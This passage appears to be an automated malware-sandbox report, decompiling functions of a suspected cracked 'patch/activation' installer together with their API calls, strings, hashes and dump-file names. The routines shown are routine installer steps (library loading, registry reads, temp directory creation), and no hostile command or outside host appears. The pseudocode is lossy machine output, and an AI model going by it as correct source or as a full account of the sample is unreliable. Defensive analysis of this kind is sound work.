				E0047AD94(); // executed
				E004863AC(_t65, _t66, _t84, _t85, _t88); // executed
				E00498A20();
				_push(0x49baf0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t87;
				SetErrorMode(1); // executed
				E0049B7EC();
				_t35 =  *0x49e62c; // 0x2252410
				E00424964(_t35, _t84, _t85, E0049B778, 0x49b76c);
				E0049B834(_t65, _t84, _t85, _t88);
				_pop(_t77);
				 *[fs:eax] = _t77;
				_t39 =  *0x49e62c; // 0x2252410
				E00424754(_t39, 0x49bc68, _t84);
				_t41 =  *0x49e62c; // 0x2252410
				ShowWindow( *(_t41 + 0x20), 5);
				_t44 =  *0x49e62c; // 0x2252410
				 *((intOrPtr*)(_t44 + 0x90)) = 0x47ae30;
				 *((intOrPtr*)(_t44 + 0x8c)) = E00484814;
				_push(_t86);
				_push(0x49bb87);
				_push( *[fs:eax]);
				 *[fs:eax] = _t87;
				E00424A38(); // executed
				E00482170(_t65, _t84, _t85, _t88); // executed
				_t49 =  *0x49e62c; // 0x2252410, executed
				E00424A48(_t49, 0x49f0f4, 0x47ae30);
				E00484988(_t88, __fp0); // executed
				_pop(_t81);
				 *[fs:eax] = _t81;
				_push(_t86);
				_push( *[fs:eax]);
				 *[fs:eax] = _t87;
				_t55 =  *0x49e62c; // 0x2252410, executed
				E00424AD8(_t55, _t84, _t85); // executed
				_pop(_t82);
				_t73 = 0x49bc05;
				 *[fs:eax] = _t82;
				_push(_t86);
				_push(0x49bc3b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t87;
				E00483BEC(0 |  *0x49f488 == 0x00000000, _t65, _t73, _t84, _t85,  *0x49f488, __fp0);
				_pop(_t83);
				 *[fs:eax] = _t83;
				_t62 =  *0x49f488; // 0x0
				E00404E58(_t62);
				return E00404E54();
			}

0x0049ba2c
0x0049ba2c
0x0049ba2c
0x0049ba35
0x0049ba3a
0x0049ba3f
0x0049ba44
0x0049ba49
0x0049ba4e
0x0049ba53
0x0049ba58
0x0049ba62
0x0049ba67
0x0049ba6c
0x0049ba71
0x0049ba76
0x0049ba7b
0x0049ba80
0x0049ba85
0x0049ba8a
0x0049ba8f
0x0049ba94
0x0049ba99
0x0049ba9e
0x0049baa3
0x0049baa8
0x0049baad
0x0049bab5
0x0049baba
0x0049babd
0x0049bac2
0x0049bac7
0x0049bad7
0x0049badc
0x0049bae1
0x0049bae8
0x0049baeb
0x0049bb0e
0x0049bb13
0x0049bb1a
0x0049bb23
0x0049bb28
0x0049bb32
0x0049bb38
0x0049bb44
0x0049bb45
0x0049bb4a
0x0049bb4d
0x0049bb55
0x0049bb5a
0x0049bb69
0x0049bb6e
0x0049bb78
0x0049bb7f
0x0049bb82
0x0049bbe5
0x0049bbeb
0x0049bbee
0x0049bbf1
0x0049bbf6
0x0049bbfd
0x0049bbff
0x0049bc00
0x0049bc16
0x0049bc17
0x0049bc1c
0x0049bc1f
0x0049bc2c
0x0049bc33
0x0049bc36
0x0049bc4a
0x0049bc4f
0x0049bc5f

APIs

Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,0049BA3A), ref: 0040334B
Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,0049BA3A), ref: 00403356

Part of subcall function 004063FC: GetModuleHandleA.KERNEL32(kernel32.dll,00000000,004066B9,?,?,?,?,00000000,?,0049BA44), ref: 00406417
Part of subcall function 004063FC: GetVersion.KERNEL32(kernel32.dll,00000000,004066B9,?,?,?,?,00000000,?,0049BA44), ref: 0040641E
Part of subcall function 004063FC: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00406433
Part of subcall function 004063FC: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040645B

Part of subcall function 00406854: 6FABDB20.COMCTL32(0049BA49), ref: 00406854

Part of subcall function 00410BF4: GetCurrentThreadId.KERNEL32 ref: 00410C42

Part of subcall function 004194D0: GetVersion.KERNEL32(0049BA62), ref: 004194D0

Part of subcall function 0044FDB0: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,0049BA76), ref: 0044FDEB
Part of subcall function 0044FDB0: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044FDF1

Part of subcall function 0045027C: GetVersionExA.KERNEL32(0049E794,0049BA7B), ref: 0045028B

Part of subcall function 004539C8: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453A86,?,?,?,?,00000000,00000000,?,0049BA8A), ref: 004539EA
Part of subcall function 004539C8: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004539F0
Part of subcall function 004539C8: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453A86,?,?,?,?,00000000,00000000,?,0049BA8A), ref: 00453A04
Part of subcall function 004539C8: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453A0A

Part of subcall function 004578E4: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 0045793E

Part of subcall function 00465A14: LoadLibraryA.KERNEL32(00000000,SHPathPrepareForWriteA,00000000,00465A8A,?,?,?,?,00000000,00000000,?,0049BA9E), ref: 00465A5F
Part of subcall function 00465A14: GetProcAddress.KERNEL32(00000000,00000000), ref: 00465A65

Part of subcall function 0046E39C: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046E3E7

Part of subcall function 0047AD94: GetModuleHandleA.KERNEL32(kernel32.dll,?,0049BAA8), ref: 0047AD9A
Part of subcall function 0047AD94: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 0047ADA7
Part of subcall function 0047AD94: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 0047ADB7

Part of subcall function 004863AC: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 004864DF

Part of subcall function 00498A20: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 00498A39

SetErrorMode.KERNEL32(00000001,00000000,0049BAF0), ref: 0049BAC2

Part of subcall function 0049B7EC: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,0049BACC,00000001,00000000,0049BAF0), ref: 0049B7F6
Part of subcall function 0049B7EC: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0049B7FC

Part of subcall function 00424964: SendMessageA.USER32 ref: 00424983

Part of subcall function 00424754: SetWindowTextA.USER32(?,00000000), ref: 0042476C

ShowWindow.USER32(?,00000005,00000000,0049BAF0), ref: 0049BB23

Part of subcall function 00484988: SetActiveWindow.USER32(?), ref: 00484A36

Strings

Setup, xrefs: 0049BB09

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: AddressProc$HandleModule$VersionWindow$ActiveClipboardCommandCurrentErrorFormatLibraryLineLoadMessageModeRegisterSendShowTextThread
String ID: Setup
API String ID: 56708735-3839654196
Opcode ID: 2217903e9f2865072847906a57765d3fb0d568c696a06ecb9b42a467f31b905f
Instruction ID: 45436910a3e38556774c512443cf6fe356218821253e756f5799c0333a1408c1
Opcode Fuzzy Hash: 2217903e9f2865072847906a57765d3fb0d568c696a06ecb9b42a467f31b905f
Instruction Fuzzy Hash: 5F31D2752046009EC601BBB7F95391D3BA8EB99708BA2443FF804D6663DF3D6814CA7E

Uniqueness

Uniqueness Score: -1.00%

Function 004863AC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E004863AC(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				char _v12;
				struct HINSTANCE__* _t43;
				intOrPtr _t66;
				intOrPtr _t72;

				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t72);
				_push(0x486504);
				_push( *[fs:eax]);
				 *[fs:eax] = _t72;
				 *0x49f445 = E0042E084(E00404A2C(0x49cdc0));
				E00485E3C();
				E00486178(__ebx, __edi, __esi, _t72);
				 *0x49c784 = 0x49f264;
				 *0x49f134 = E00402B30(1);
				 *0x49f138 = E00402B30(1);
				 *0x49f3dc = E00402B30(1);
				 *0x49f3e0 = E00402B30(1);
				 *0x49f3e4 = E00402B30(1);
				 *0x49f3e8 = E00402B30(1);
				E00486234();
				 *0x49f46c = E00402B30(1);
				 *0x49f470 = E00402B30(1);
				 *0x49f3b0 = E00402B30(1);
				 *0x49f3a8 = E00402B30(1);
				 *0x49f3ac = E00402B30(1);
				E0042DD54( &_v12);
				E0042C88C(_v12,  &_v8);
				E0040357C( &_v8, "shell32.dll");
				_t43 = E0042E824(_v8, __ebx, 0x8000); // executed
				 *0x49f50c = GetProcAddress(_t43, "SHGetKnownFolderPath");
				_pop(_t66);
				 *[fs:eax] = _t66;
				_push(E0048650B);
				return E00403420( &_v12, 2);
			}

0x004863af
0x004863b1
0x004863b3
0x004863b4
0x004863b5
0x004863b8
0x004863b9
0x004863be
0x004863c1
0x004863d3
0x004863d8
0x004863dd
0x004863e2
0x004863f8
0x00486409
0x0048641a
0x0048642b
0x0048643c
0x0048644d
0x00486452
0x00486463
0x00486474
0x00486485
0x00486496
0x004864a7
0x004864b4
0x004864bf
0x004864cc
0x004864d9
0x004864e4
0x004864eb
0x004864ee
0x004864f1
0x00486503

APIs

Part of subcall function 00485E3C: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00485E4D
Part of subcall function 00485E3C: GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00485E5A
Part of subcall function 00485E3C: GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00485E68
Part of subcall function 00485E3C: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00485E70
Part of subcall function 00485E3C: GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00485E7C
Part of subcall function 00485E3C: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00485E9D
Part of subcall function 00485E3C: GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00485EB0
Part of subcall function 00485E3C: GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00485EB6

Part of subcall function 00486178: GetVersionExA.KERNEL32(?,004863E2,00000000,00486504,?,?,?,?,00000000,00000000,?,0049BAAD), ref: 00486186
Part of subcall function 00486178: GetVersionExA.KERNEL32(0000009C,?,004863E2,00000000,00486504,?,?,?,?,00000000,00000000,?,0049BAAD), ref: 004861D8

Part of subcall function 0042DD54: GetSystemDirectoryA.KERNEL32 ref: 0042DD67

Part of subcall function 0042E824: SetErrorMode.KERNEL32(00008000), ref: 0042E82E
Part of subcall function 0042E824: LoadLibraryA.KERNEL32(00000000,00000000,0042E878,?,00000000,0042E896,?,00008000), ref: 0042E85D

GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 004864DF

Strings

shell32.dll, xrefs: 004864C7
SHGetKnownFolderPath, xrefs: 004864AC

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: AddressProc$HandleModuleSystemVersion$CurrentDirectoryErrorInfoLibraryLoadModeNativeProcess
String ID: SHGetKnownFolderPath$shell32.dll
API String ID: 1303913335-2936008475
Opcode ID: 908d6e67ee5bab08ebaef87692d62277a9194b68cfc666c248f8018bed7f5e16
Instruction ID: 0a3b8753df86b64a0abe51da698ff3945e27f94a4f66e9c257dfb1cfa232dc74
Opcode Fuzzy Hash: 908d6e67ee5bab08ebaef87692d62277a9194b68cfc666c248f8018bed7f5e16
Instruction Fuzzy Hash: 2A315EB06002019EC740FFBA999674A3BA4DB5430CB91897BF400FB3D2D77DA8099B5E

Uniqueness

Uniqueness Score: -1.00%

Function 0047B00C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 86
registryCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E0047B00C(void* __eax, void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v8;
				void* _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char* _v36;
				void* _t35;
				intOrPtr _t36;
				void* _t37;
				void* _t48;
				intOrPtr* _t49;
				intOrPtr _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t73;
				void* _t74;
				intOrPtr _t75;

				_t50 = __ecx;
				_t73 = _t74;
				_t75 = _t74 + 0xffffffe0;
				_v20 = 0;
				_v16 = 0;
				_v8 = __edx;
				_t48 = __eax;
				_push(_t73);
				_push(0x47b10d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t75;
				E00403494(_a4, __ecx);
				if(_t48 == 0) {
					L5:
					_pop(_t60);
					 *[fs:eax] = _t60;
					_push(E0047B114);
					return E00403420( &_v20, 2);
				} else {
					E0047AF98(_t48, _t50,  &_v16);
					_t71 = 2;
					_t49 = 0x49cc9c;
					while(1) {
						_v36 = "Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall";
						_v32 = 0xb;
						_v28 = _v16;
						_v24 = 0xb;
						E00407D84("%s\\%s_is1", 1,  &_v36,  &_v20);
						_t35 = E00403738(_v20);
						_t36 =  *0x49cc94; // 0x2, executed
						_t37 = E0042E2AC(_t36, _t35,  *_t49,  &_v12, 1, 0); // executed
						if(_t37 == 0) {
							break;
						}
						_t49 = _t49 + 4;
						_t71 = _t71 - 1;
						if(_t71 != 0) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_push(_t73);
					_push(0x47b0e1);
					_push( *[fs:eax]);
					 *[fs:eax] = _t75;
					E00403738(_v8);
					E0042E1DC();
					_pop(_t66);
					 *[fs:eax] = _t66;
					_push(E0047B0F2);
					return RegCloseKey(_v12);
				}
				L6:
			}

0x0047b00c
0x0047b00d
0x0047b00f
0x0047b017
0x0047b01a
0x0047b01f
0x0047b022
0x0047b029
0x0047b02a
0x0047b02f
0x0047b032
0x0047b039
0x0047b040
0x0047b0f2
0x0047b0f4
0x0047b0f7
0x0047b0fa
0x0047b10c
0x0047b046
0x0047b04b
0x0047b050
0x0047b055
0x0047b05a
0x0047b06b
0x0047b06e
0x0047b075
0x0047b078
0x0047b089
0x0047b091
0x0047b09a
0x0047b09f
0x0047b0a6
0x00000000
0x00000000
0x0047b0e8
0x0047b0eb
0x0047b0ec
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0047b0ec
0x0047b0aa
0x0047b0ab
0x0047b0b0
0x0047b0b3
0x0047b0b9
0x0047b0c5
0x0047b0cc
0x0047b0cf
0x0047b0d2
0x0047b0e0
0x0047b0e0
0x00000000

APIs

Part of subcall function 0042E2AC: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00485FB3,?,00000001,?,?,00485FB3,?,00000001,00000000), ref: 0042E2C8

RegCloseKey.ADVAPI32(?,0047B0F2,?,?,00000001,00000000,00000000,0047B10D), ref: 0047B0DB

Strings

%s\%s_is1, xrefs: 0047B084
Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0047B066

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CloseOpen
String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
API String ID: 47109696-1598650737
Opcode ID: 065378d35833d496f10a5c42d9e6932571d79af8682fa40a96d658d7fa4ed314
Instruction ID: 72e7e3a815698905cf2a8865a6f5f2f162ab337690929d3c45f1fbd164993866
Opcode Fuzzy Hash: 065378d35833d496f10a5c42d9e6932571d79af8682fa40a96d658d7fa4ed314
Instruction Fuzzy Hash: 46214370B042545FDB01DF66C8527DEBBE8EB49704F90847AE408E7381D77899018B95

Uniqueness

Uniqueness Score: -1.00%

Function 00454220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E00454220(void* __eax, long __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				int _t30;
				intOrPtr _t62;
				void* _t72;
				intOrPtr _t75;

				_t70 = __edi;
				_t53 = __ebx;
				_t54 = 0;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__edi);
				_t72 = __eax;
				_push(_t75);
				_push(0x45430f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t75;
				while(1) {
					E0042DEA8( &_v12, _t53, _t54, _t70, _t72); // executed
					_t54 = 0x454328;
					E00453FAC(0, _t53, 0x454328, _v12, _t70, _t72,  &_v8); // executed
					_t30 = CreateDirectoryA(E00403738(_v8), 0); // executed
					if(_t30 != 0) {
						break;
					}
					_t53 = GetLastError();
					if(_t38 != 0xb7) {
						E00451C30(0x36,  &_v28, _v8);
						_v24 = _v28;
						E004071F8(_t53,  &_v32);
						_v20 = _v32;
						E0042ED58(_t53,  &_v36);
						_v16 = _v36;
						E00451C00(0x68, 2,  &_v24,  &_v12);
						_t54 = _v12;
						E0040909C(_v12, 1);
						E0040311C();
					}
				}
				E00403494(_t72, _v8);
				_pop(_t62);
				 *[fs:eax] = _t62;
				_push(E00454316);
				E00403420( &_v36, 3);
				return E00403420( &_v12, 2);
			}

0x00454220
0x00454220
0x00454223
0x00454225
0x00454226
0x00454227
0x00454228
0x00454229
0x0045422a
0x0045422b
0x0045422c
0x0045422d
0x0045422f
0x00454230
0x00454234
0x00454235
0x0045423a
0x0045423d
0x00454240
0x00454247
0x0045424f
0x00454256
0x00454266
0x0045426d
0x00000000
0x00000000
0x00454274
0x0045427c
0x0045428a
0x00454292
0x0045429a
0x004542a2
0x004542aa
0x004542b2
0x004542bf
0x004542c4
0x004542ce
0x004542d3
0x004542d3
0x0045427c
0x004542e2
0x004542e9
0x004542ec
0x004542ef
0x004542fc
0x0045430e

APIs

CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0045430F,?,?,00000000,0049E62C,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00454266
GetLastError.KERNEL32(00000000,00000000,?,00000000,0045430F,?,?,00000000,0049E62C,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045426F

Strings

.tmp, xrefs: 0045424F

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: .tmp
API String ID: 1375471231-2986845003
Opcode ID: a088e9ad1ac8c859f830a6b38babd2e41a4a9b8bfeab7a1983125dd9a2918e27
Instruction ID: 415d91b16f05740ba1416afe7bf5adb9ba5615b539517dd81add0c9acb6d8760
Opcode Fuzzy Hash: a088e9ad1ac8c859f830a6b38babd2e41a4a9b8bfeab7a1983125dd9a2918e27
Instruction Fuzzy Hash: C9216775A002189BDB01EFA1C8429DFB7B8EB84309F50457BFC01BB342D63C9E458B65

Uniqueness

Uniqueness Score: -1.00%

Function 004578E4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 34%

			E004578E4(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				char _v12;
				struct HINSTANCE__* _t18;
				intOrPtr _t31;
				intOrPtr _t37;

				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t37);
				_push(0x457963);
				_push( *[fs:eax]);
				 *[fs:eax] = _t37;
				E00457874(E00404A2C(0x49cb08), __edi, __esi, _t37, __eflags);
				E0042DD54( &_v12);
				E0042C88C(_v12,  &_v8);
				E0040357C( &_v8, "shell32.dll");
				_t18 = E0042E824(_v8, __ebx, 0x8000); // executed
				 *0x49f00c = GetProcAddress(_t18, "SHCreateItemFromParsingName");
				_pop(_t31);
				 *[fs:eax] = _t31;
				_push(E0045796A);
				return E00403420( &_v12, 2);
			}

0x004578e7
0x004578e9
0x004578eb
0x004578ec
0x004578ed
0x004578f0
0x004578f1
0x004578f6
0x004578f9
0x00457906
0x00457913
0x0045791e
0x0045792b
0x00457938
0x00457943
0x0045794a
0x0045794d
0x00457950
0x00457962

APIs

Part of subcall function 00457874: CoInitialize.OLE32(00000000), ref: 0045787A

Part of subcall function 0042DD54: GetSystemDirectoryA.KERNEL32 ref: 0042DD67

Part of subcall function 0042E824: SetErrorMode.KERNEL32(00008000), ref: 0042E82E
Part of subcall function 0042E824: LoadLibraryA.KERNEL32(00000000,00000000,0042E878,?,00000000,0042E896,?,00008000), ref: 0042E85D

GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 0045793E

Strings

shell32.dll, xrefs: 00457926
SHCreateItemFromParsingName, xrefs: 0045790B

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: AddressDirectoryErrorInitializeLibraryLoadModeProcSystem
String ID: SHCreateItemFromParsingName$shell32.dll
API String ID: 1013667774-2320870614
Opcode ID: 77c59d3b40fdf16789a6f1b6c398cc8a4dcbb3a6b410720b7a14e3a082a16fe9
Instruction ID: 883c9a478e7d65875247b88054ead2603694175a92ab65d05d339cd7b334e9d1
Opcode Fuzzy Hash: 77c59d3b40fdf16789a6f1b6c398cc8a4dcbb3a6b410720b7a14e3a082a16fe9
Instruction Fuzzy Hash: F7F03670604608ABE700EBA6E842F5D77ACDB45759F604077B800B2692D67CAE08C96D

Uniqueness

Uniqueness Score: -1.00%

Function 0046E39C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0046E39C(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				char _v12;
				struct HINSTANCE__* _t15;
				intOrPtr _t28;
				intOrPtr _t34;

				_push(0);
				_push(0);
				_push(__ebx);
				_push(_t34);
				_push(0x46e40c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t34;
				E0042DD54( &_v12);
				E0042C88C(_v12,  &_v8);
				E0040357C( &_v8, "shell32.dll");
				_t15 = E0042E824(_v8, __ebx, 0x8000); // executed
				 *0x49f0bc = GetProcAddress(_t15, "SHPathPrepareForWriteA");
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E0046E413);
				return E00403420( &_v12, 2);
			}

0x0046e39f
0x0046e3a1
0x0046e3a3
0x0046e3a8
0x0046e3a9
0x0046e3ae
0x0046e3b1
0x0046e3bc
0x0046e3c7
0x0046e3d4
0x0046e3e1
0x0046e3ec
0x0046e3f3
0x0046e3f6
0x0046e3f9
0x0046e40b

APIs

Part of subcall function 0042DD54: GetSystemDirectoryA.KERNEL32 ref: 0042DD67

Part of subcall function 0042E824: SetErrorMode.KERNEL32(00008000), ref: 0042E82E
Part of subcall function 0042E824: LoadLibraryA.KERNEL32(00000000,00000000,0042E878,?,00000000,0042E896,?,00008000), ref: 0042E85D

GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046E3E7

Strings

shell32.dll, xrefs: 0046E3CF
SHPathPrepareForWriteA, xrefs: 0046E3B4

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: AddressDirectoryErrorLibraryLoadModeProcSystem
String ID: SHPathPrepareForWriteA$shell32.dll
API String ID: 2552568031-2683653824
Opcode ID: 3f0d3514a23c37851456d116febb2af5c8ca922eb4f10ed87c397e76bc5b7ffd
Instruction ID: 1520e6e4c9beca3123f98d7cbe6aabbef4d784ad694bed30d21e1b99286f75d0
Opcode Fuzzy Hash: 3f0d3514a23c37851456d116febb2af5c8ca922eb4f10ed87c397e76bc5b7ffd
Instruction Fuzzy Hash: 48F04434604618BBDB00EB63DC42F5E7BECD745754FA14076F400A6591EA78AE048969

Uniqueness

Uniqueness Score: -1.00%

Function 0047E814 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0047E814() {
				void* _v8;
				void* __ecx;
				void* _t11;
				long _t17;
				void* _t18;

				if( *0x49f446 == 0) {
					_t18 = 0;
				} else {
					_t18 = 2;
				}
				_t11 = E0042E2AC(_t18,  *0x0049CD40, 0x80000002,  &_v8, 1, 0); // executed
				if(_t11 == 0) {
					E0042E1DC();
					E0042E1DC();
					_t17 = RegCloseKey(_v8); // executed
					return _t17;
				}
				return _t11;
			}

0x0047e820
0x0047e826
0x0047e822
0x0047e822
0x0047e822
0x0047e845
0x0047e84c
0x0047e85b
0x0047e86d
0x0047e876
0x00000000
0x0047e876
0x0047e87e

APIs

RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047EB66,00000000,0047EB7C), ref: 0047E876

Strings

RegisteredOwner, xrefs: 0047E853
RegisteredOrganization, xrefs: 0047E865

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

